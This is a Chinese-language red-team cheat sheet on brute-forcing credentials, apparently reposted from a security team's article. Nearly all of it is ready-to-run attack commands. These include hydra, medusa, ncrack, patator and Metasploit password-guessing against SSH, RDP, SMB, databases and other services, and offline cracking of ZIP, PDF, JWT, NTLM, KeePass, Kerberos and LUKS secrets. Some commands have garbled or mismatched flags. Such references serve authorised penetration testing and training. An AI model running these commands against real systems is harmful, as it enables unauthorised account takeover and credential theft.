Red Team备忘录之暴力破解
2022-12-11 01:42:12 Author: Gcow安全团队(查看原文) 阅读量:16 收藏

默认凭证

在谷歌中搜索正在使用的技术的默认凭据,或尝试这些链接:

  • https://github.com/ihebski/DefaultCreds-cheat-sheet

  • http://www.phenoelit.org/dpl/dpl.html

  • http://www.vulnerabilityassessment.co.uk/passwordsC.htm

  • https://192-168-1-1ip.mobi/default-router-passwords-list/

  • https://datarecovery.com/rd/default-passwords/

  • https://bizuns.com/default-passwords-list

  • https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv

  • https://github.com/Dormidera/WordList-Compendium

  • https://www.cirt.net/passwords

  • http://www.passwordsdatabase.com/

  • https://many-passwords.github.io/

创建自己的字典

找到尽可能多的关于目标的信息,并生成一个自定义字典。可能有帮助的工具:

Crunch

  1. crunch 4 6 0123456789ABCDEF -o crunch1.txt #用字母表从4到6

  2. crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # 长度只有4,使用mixalpha字符集(在charset.lst文件中)

  3. @ Lower case alpha characters

  4. , Upper case alpha characters

  5. % Numeric characters

  6. ^ Special characters including spac

  7. crunch 6 8 -t ,@@^^%%

Cewl

  1. cewl example.com -m 5 -w words.txt

CUPP

根据你对受害者的了解生成密码(姓名,日期…)

  1. python3 cupp.py -h

pydictor

词汇表

  • https://github.com/danielmiessler/SecLists

  • https://github.com/Dormidera/WordList-Compendium

  • https://github.com/kaonashi-passwords/Kaonashi

  • https://github.com/google/fuzzing/tree/master/dictionaries

  • https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

服务

按服务名称的字母顺序排序。

AFP

  1. nmap -p 548 --script afp-brute <IP>

  2. msf> use auxiliary/scanner/afp/afp_login

  3. msf> set BLANK_PASSWORDS true

  4. msf> set USER_AS_PASS true

  5. msf> set PASS_FILE <PATH_PASSWDS>

  6. msf> set USER_FILE <PATH_USERS>

  7. msf> run

AJP

  1. nmap --script ajp-brute -p 8009 <IP>

Cassandra

  1. nmap --script cassandra-brute -p 9160 <IP>

CouchDB

  1. msf> use auxiliary/scanner/couchdb/couchdb_login

  2. hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Docker Registry

  1. hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

  1. hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

  1. hydra -l root -P passwords.txt [-t 32] <IP> ftp

  2. ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]

  3. medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

HTTP Generic Brute

WFuzz

HTTP Basic Auth

  1. hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/

  2. # https使用https-get模式

  3. medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10

HTTP - Post Form

  1. hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

  2. # https使用https-post-form模式

对于https,你必须从“http-post-form”更改为“http -post-form”

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

  1. cmsmap -f W/J/D/M -u a -p a https://wordpress.com

IMAP

  1. hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V

  2. hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V

  3. nmap -sV --script imap-brute -p <PORT> <IP>

IRC

  1. nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

  1. nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

  1. #hashcat

  2. hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

  3. #https://github.com/Sjord/jwtcrack

  4. python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

  5. #John

  6. john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

  7. #https://github.com/ticarpi/jwt_tool

  8. python3 jwt_tool.py -d wordlists.txt <JWT token>

  9. #https://github.com/brendan-rius/c-jwt-cracker

  10. ./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

  11. #https://github.com/mazen160/jwt-pwn

  12. python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

  13. #https://github.com/lmammino/jwt-cracker

  14. jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

  1. nmap --script ldap-brute -p 389 <IP>

MQTT

  1. ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v

Mongo

  1. nmap -sV --script mongodb-brute -n -p 27017 <IP>

  2. use auxiliary/scanner/mongodb/mongodb_login

MySQL

  1. # hydra

  2. hydra -L usernames.txt -P pass.txt <IP> mysql

  3. # msfconsole

  4. msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

  5. # medusa

  6. medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

OracleSQL

  1. patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

  2. ./odat.py passwordguesser -s $SERVER -d $SID

  3. ./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

  4. #msf1

  5. msf> use admin/oracle/oracle_login

  6. msf> set RHOSTS <IP>

  7. msf> set RPORT 1521

  8. msf> set SID <SID>

  9. #msf2, this option uses nmap and it fails sometimes for some reason

  10. msf> use scanner/oracle/oracle_login

  11. msf> set RHOSTS <IP>

  12. msf> set RPORTS 1521

  13. msf> set SID <SID>

  14. #for some reason nmap fails sometimes when executing this script

  15. nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

为了使用oracle_loginpatator 你需要安装:

  1. pip3 install cx_Oracle --upgrade

Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):

  1. nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

  1. hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V

  2. hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

PostgreSQL

  1. hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres

  2. medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres

  3. ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432

  4. patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

  5. use auxiliary/scanner/postgres/postgres_login

  6. nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

PPTP

您可以从https://http.kali.org/pool/main/t/thc-pptp-bruter/下载安装' .deb '包。

  1. sudo dpkg -i thc-pptp-bruter*.deb #Install the package

  2. cat rockyou.txt | thc-pptp-bruter u <Username> <IP>

RDP

  1. ncrack -vv --user <User> -P pwds.txt rdp://<IP>

  2. hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

Redis

  1. msf> use auxiliary/scanner/redis/redis_login

  2. nmap --script redis-brute -p 6379 <IP>

  3. hydra P /path/pass.txt redis://<IP>:<PORT> # 6379为默认值

Rexec

  1. hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

  1. hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

  1. hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

  1. nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

  1. hydra -l root -P passwords.txt <IP> rtsp

SNMP

  1. msf> use auxiliary/scanner/snmp/snmp_login

  2. nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]

  3. onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>

  4. hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

  1. nmap --script smb-brute -p 445 <IP>

  2. hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

SMTP

  1. hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V

  2. hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #带SSL的SMTP的587端口

SOCKS

  1. nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>

SQL Server

  1. #使用计算机的NetBIOS名称作为域

  2. crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

  3. hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql

  4. medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql

  5. nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #如果需要,使用域。注意列表中密码的数量,这可能会阻塞帐户

  6. msf> use auxiliary/scanner/mssql/mssql_login #小心,你可以屏蔽账户。如果你有一个域,设置它并使用USE_WINDOWS_ATHENT

SSH

  1. hydra -l root -P passwords.txt [-t 32] <IP> ssh

  2. ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]

  3. medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh

  4. patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'

Telnet

  1. hydra -l root -P passwords.txt [-t 32] <IP> telnet

  2. ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]

  3. medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

VNC

  1. hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc

  2. medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc

  3. ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T

  4. patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0

  5. use auxiliary/scanner/vnc/vnc_login

  6. nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

  7. #Metasploit

  8. use auxiliary/scanner/vnc/vnc_login

  9. set RHOSTS <ip>

  10. set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

  1. crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

本地

在线破解数据库

  • ~~http://hashtoolkit.com/reverse-hash?~~ (MD5 & SHA1)

  • https://www.onlinehashcrack.com/ (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)

  • https://crackstation.net/ (Hashes)

  • https://md5decrypt.net/ (MD5)

  • https://gpuhash.me/ (Hashes and file hashes)

  • https://hashes.org/search.php (Hashes)

  • https://www.cmd5.org/ (Hashes)

  • https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)

  • https://www.md5online.org/md5-decrypt.html (MD5)

  • http://reverse-hash-lookup.online-domain-tools.com/

在尝试强力执行哈希之前检查一下这一点。

ZIP

  1. #sudo apt-get install fcrackzip

  2. fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

  1. zip2john file.zip > zip.john

  2. john zip.john

  1. #$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$

  2. hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt

  3. .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Known plaintext zip attack

您需要知道加密压缩包中包含的文件的明文(或部分明文)。您可以检查文件名和文件大小包含在加密zip运行: ' 7zl encrypted.zip ' 下载bkcrackfrom发布页面)。

  1. # 您需要创建一个压缩文件,其中只包含加密的压缩文件中的文件

  2. zip plaintext.zip plaintext.file

  3. ./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>

  4. # 现在等待,这将打印一个密钥,如7b549874 ebc25ec5 7e465e18

  5. # 使用该密钥,您可以创建一个包含encrypted.zip内容的新zip文件

  6. # 但是你设置了不同的通道(这样你就可以解密了)

  7. ./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd

  8. unzip unlocked.zip #用户new_pwd作为密码

7z

  1. cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

  1. #下载并安装7z2john的要求

  2. wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl

  3. apt-get install libcompress-raw-lzma-perl

  4. ./7z2john.pl file.7z > 7zhash.john

PDF

  1. apt-get install pdfcrack

  2. pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt

  3. #Pdf2john不能很好地工作,John不知道哪种哈希类型

  4. # 永久解密pdf

  5. sudo apt-get install qpdf

  6. qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

PDF Owner Password

要破解PDF所有者密码,请使用这个: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

  1. git clone https://github.com/Sjord/jwtcrack.git

  2. cd jwtcrack

  3. #使用crackjwt.py进行暴力破解

  4. python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

  5. #利用john进行暴力破解

  6. python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john

  7. john jwt.john #这对Kali-John 不起作用

NTLM cracking

  1. Format:USUARIO:ID:HASH_LM:HASH_NT:::

  2. john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes

  3. hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

  1. sudo apt-get install -y kpcli #安装keepass工具如keepass2john

  2. keepass2john file.kdbx > hash #keepass只使用密码

  3. keepass2john -k <file-password> file.kdbx > hash # keepass还使用一个文件作为所需的凭据

  4. #keepass可以使用密码和/或文件作为凭据,如果它使用这两者,则需要将它们提供给keepass2john

  5. john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

  1. john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast

  2. hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt

  3. ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Lucks image

Method 1

Install: https://github.com/glv2/bruteforce-luks

  1. bruteforce-luks -f ./list.txt ./backup.img

  2. cryptsetup luksOpen backup.img mylucksopen

  3. ls /dev/mapper/ #你应该在这里找到图片mylucksopen

  4. mount /dev/mapper/mylucksopen /mnt

Method 2

  1. cryptsetup luksDump backup.img #检查有效载荷偏移设置为4096

  2. dd if=backup.img of=luckshash bs=512 count=4097 #有效载荷偏移量+1

  3. hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt

  4. cryptsetup luksOpen backup.img mylucksopen

  5. ls /dev/mapper/ #你应该在这里找到图片mylucksopen

  6. mount /dev/mapper/mylucksopen /mnt

另一个Luks BF教程: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

Mysql

  1. #John hash 格式

  2. <USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>

  3. dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

PGP/GPG Private key

  1. gpg2john private_pgp.key #这将生成散列并将其保存到一个文件中

  2. john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

DPAPI Master Key

使用 https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py 或者是 john

Open Office Pwd Protected Column

如果你有一个xlsx文件,其中一个列受密码保护,你可以取消它的保护:

  • 上传至谷歌驱动器,密码将自动删除

  • 手动删除:

  1. unzip file.xlsx

  2. grep -R "sheetProtection" ./*

  3. # 查找类似以下内容:<sheetProtection algorithmName=“SHA-512”

  4. hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

  5. # 删除这一行并重新压缩文件

  6. zip -r file.xls .

PFX Certificates

  1. # 从 https://github.com/Ridter/p12tool

  2. ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt

  3. # 从 https://github.com/crackpkcs12/crackpkcs12

  4. crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx

Tools

Hash 例子: https://openwall.info/wiki/john/sample-hashes

Hash-identifier

  1. hash-identifier

  2. > <HASH>

Wordlists

  • Rockyou

  • Probable-Wordlists

  • Kaonashi

  • Seclists - Passwords

Wordlist Generation Tools

  • kwprocessor: 先进的键盘行走生成器,具有可配置的基本字符,键图和路由。

  1. kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

John mutation

读取/etc/john/john.conf并进行配置

  1. john --wordlist=words.txt --rules --stdout > w_mutated.txt

  2. john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

Hashcat attacks

  • Wordlist攻击 (' -a 0 ')与规则

Hashcat已经带有一个包含规则的文件夹,但您可以在这里找到其他有趣的规则

  1. hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule

  • 词表组合器攻击

使用hashcat.\可以将2个单词列表合并为1

如果列表1包含单词hello,而第二个包含单词worldearth的两行。将生成单词' helloworld '和' helloearth '。

  1. # 这将结合两个单词表

  2. hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

  3. # 与前面相同的攻击,但在新生成的单词中添加字符

  4. # 在前面的例子中,这会生成:

  5. ## hello-world!

  6. ## hello-earth!

  7. hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!

  • Mask attack ( -a3)

  1. # 使用简单掩码进行掩码攻击

  2. hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

  3. hashcat --help #将显示字符集和如下

  4. ? | Charset

  5. ===+=========

  6. l | abcdefghijklmnopqrstuvwxyz

  7. u | ABCDEFGHIJKLMNOPQRSTUVWXYZ

  8. d | 0123456789

  9. h | 0123456789abcdef

  10. H | 0123456789ABCDEF

  11. s | !"#$%&'()*+,-./:;<=>[email protected][\]^_`{|}~

  12. a | ?l?u?d?s

  13. b | 0x00 - 0xff

  14. # 声明自定义字符集的掩码攻击

  15. hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1

  16. ## -1? d? S?定义一个自定义字符集(数字和特殊字符)。

  17. ## ?u?l?l?l?l?l?l?l?1 ”?1”是自定义字符集。

  18. # 密码长度可变的掩码攻击

  19. ## 创建一个名为masks的文件。Hcmask包含以下内容:

  20. ?d?s,?u?l?l?l?l?1

  21. ?d?s,?u?l?l?l?l?l?1

  22. ?d?s,?u?l?l?l?l?l?l?1

  23. ?d?s,?u?l?l?l?l?l?l?l?1

  24. ?d?s,?u?l?l?l?l?l?l?l?l?1

  25. ## 用它来破解密码

  26. hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask

  • Wordlist + Mask ( -a6) / Mask + Wordlist ( -a7) attack

  1. # 掩码编号将被附加到单词列表中的每个单词

  2. hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

  3. # 掩码编号将被加到单词列表中的每个单词前面

  4. hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Hashcat modes

  1. hashcat --example-hashes | grep -B1 -A2 "NTLM"

破解Linux哈希- /etc/shadow文件

  1. 500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems

  2. 3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems

  3. 7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems

  4. 1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

破解Windows散列

  1. 3000 | LM                                               | Operating-Systems

  2. 1000 | NTLM                                             | Operating-Systems

破解常见的应用程序哈希

  1.  900 | MD4                                              | Raw Hash

  2.    0 | MD5                                              | Raw Hash

  3. 5100 | Half MD5                                         | Raw Hash

  4.  100 | SHA1                                             | Raw Hash

  5. 10800 | SHA-384                                          | Raw Hash

  6. 1400 | SHA-256                                          | Raw Hash

  7. 1700 | SHA-512                                          | Raw Hash

推荐一个靶场,靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU 从web到内网再到域的靶场环境都全,且出题的思路很好,感兴趣的可以去玩玩

文章来源: http://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247488101&idx=2&sn=05b50b3cb7b462a8a889e3c0229a29d2&chksm=fa76dd15cd0154039ab7a07c3b40f5192bf3525c24d6c5c3fb36302ae8e07377a982260e4734#rd
如有侵权请联系:admin#unsafe.sh